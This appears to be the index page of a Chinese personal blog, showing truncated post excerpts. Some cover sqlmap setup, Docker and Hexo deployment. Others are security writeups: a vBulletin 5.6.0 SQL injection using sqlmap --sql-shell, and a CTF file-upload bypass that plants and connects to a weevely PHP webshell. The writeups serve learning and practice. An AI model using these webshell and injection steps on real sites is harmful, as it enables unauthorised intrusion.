纵饮孤独

Windows添加Sqlmap环境变量(NEW)首先我喜欢把脚本放在OneDrive目录，不是恰饭 当然你也可以选择放在其他地方 先看代码！ 首先声明一点哈，有点菜 在纠结一个问题，为什么bat用不了$@ 后来发现这个是shell用的😂 1python D:\sqlmap\sqlmap.py %0 %1 %2 %3 %4 %5 %6 %7 %8 %9 就这么简单，想不到吧，之前配置过一次，不是这样的，忘记了 当然你也可以俄罗斯套娃，bat传参sh脚本 接着就是环境变量配置 好啦，开心的玩耍吧！

vBulletin 5.6.0 SQL injection tool记一次面试题目[toc] 123IP：NONECMS：vBulletin 5.6.0Attack mode：SQL injection 截图： 首页截图 CMS型号查找 后期用于sqlshell写路劲 漏洞相关知道创宇 漏洞利用 安全狮 漏洞浮现及原理 漏洞工具Python工具https://gitee.com/zygds/vBulletin-5.6.0-SQL-injection-tool Sqlmap：1sqlmap -r 1.txt --sql-shell # 命令可换其他 1.txt 12345POST /ajax/api/content_infraction/getIndexableContent HTTP/1.1Host: # 此处填写ip:post,80,443,不需要填写，记得删除这些文字User-Agent: Mozilla/5.0 (compatible; Baiduspider&#x ...

Ubuntu Docker安装卸载旧版本Docker 的旧版本被称为 docker，docker.io 或 docker-engine 。如果已安装，请卸载它们：1$ sudo apt-get remove docker docker-engine docker.io containerd runc 当前称为 Docker Engine-Community 软件包 docker-ce 。安装 Docker Engine-Community，以下介绍两种方式。使用 Docker 仓库进行安装在新主机上首次安装 Docker Engine-Community 之前，需要设置 Docker 仓库。之后，您可以从仓库安装和更新 Docker 。设置仓库更新 apt 包索引。1$ sudo apt-get update 安装 apt 依赖包，用于通过HTTPS来获取仓库:123456$ sudo apt-get install \ apt-transport-https \ ca-certificates \ curl \ gnupg-agent \ softw ...

md格式：12345678910---title: '文章名称'date: 2020-06-18 16:35:03tags: 分类1,分类2]published: true # 是否发布hideInList: false # 是否隐藏feature: https://cdn.jsdelivr.net/gh/用户名/仓库名@master资源名 # 文章预览图isTop: false # 是否置顶--- typora图片上传配置 此时不需要PICGOwhy？picgo工作原理123git add .git commit -m "提交信息"git push 每上传一张照片就要提交一次，容易引发bugGridea配置域名处需要填这个，我们还是使用GitHub仓库，因为由cdn加持，索引网速不会慢123cdn.jsdelivr.net/gh/用户名/仓库名@master这里发现一个bug这里需要填写真实地址，不然文章打不开 我不确定这个有用没 自定义配置-图片：点击替换即可 ...

上传漏洞 首先，标题是upload，提示就是上传漏洞无非就是js拦截，代码拦截，看了以下网页head头，发现js代码，关键字jpg burpsuite 抓包，配置代理 weevely 生成一句话 12weevely generate password ./1.php #use weevely在当前目录生成1.php，密码passwdmv 1.php 1.php.jpg 选择文件上传 && burpsuite 抓包 删掉.jpg 回显 upload success : upload/1592555994.1.php weevely 连接 12345weevely http://220.249.52.133:57535/upload/1592554838.1.php password # weevely 连接dir # 显示目录cd ../..发现flag.phpcat flag.php 得到flag 推荐一个上传漏洞的靶场：https://github.com/c0ny1/upload-lab ...

SEO优化报告生成 H标签 robots.txt sitemap.xml nofollow属性 重定向 CDN加速 最近好无聊呀 在学渗透测试

ApylaerApyler怎么添加就不描述了，这个脚本只是方便整合歌曲列表 文件：artist.txt index.py name.txt lrc.txt music.txt pic.txt write.txt快速整理👍

bugku靶场webweb1https://segmentfault.com/a/1190000016750234 知识基础 涉及到的几个函数： 1.$_REQUEST: 可以获取以POST方法和GET方法提交的数据，但是速度比较慢 2.eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码，且必须以分号结尾。 12345<?phpeval("echo'hello';echo' world';");?># outputhello world 3.var_dump: 函数用于输出变量的相关信息 1234# 数字var_dump(1); > int(1)# 字符串var_dump("string"); > string(6) "string" 解题思路 eval应该是此题的突破口，能够执行php代码。 hello是接受参数的变量，接下来就是构建hello变量，使其能够闭合var_dump，利用print_r输出 首先闭合var ...

Apylaer开发：troy exzyhexo注意事项 请不要以root身份运行，否则会引起文件权限问题 提示报错请停止并删除node_modules,检查log.txt 检查是不三该升级了 cnpm update * –save 转载请注明原创，喜欢可价格好友多联系！ 请提前准备好heroku账号并登录 请在提示时开启~~不要提前开启 提示报错请停止并删除node_modules,检查log.txt bug提交请联系troy@tx.zygd.site windows nodebash暂未测试，理应可以 请确表npm已换源，换源教程 heroku教程 主要产品：Gitee Github Coding Fast Heroku Vercel … 安装方法请自行百度 其中 fast已经复制到桌面，直接使用 文件结构1blog【hexo自带结构,[coding_config.yml,gitee_config.yml,gith ...

Hexo高效部署开发：troy 注意事项 请不要以root身份运行，否则会引起文件权限问题 提示报错请停止并删除node_modules,检查log.txt 检查是不三该升级了 cnpm update * –save 转载请注明原创，喜欢可价格好友多联系！ 请提前准备好heroku账号并登录 请在提示时开启~~不要提前开启 提示报错请停止并删除node_modules,检查log.txt bug提交请联系troy@tx.zygd.site windows nodebash暂未测试，理应可以 请确表npm已换源，换源教程 heroku教程 主要产品：Gitee Github Coding Fast Heroku Vercel … 安装方法请自行百度 其中 fast已经复制到桌面，直接使用 文件结构1blog【hexo自带结构,[coding_config.yml,gitee_config.yml,github_confi ...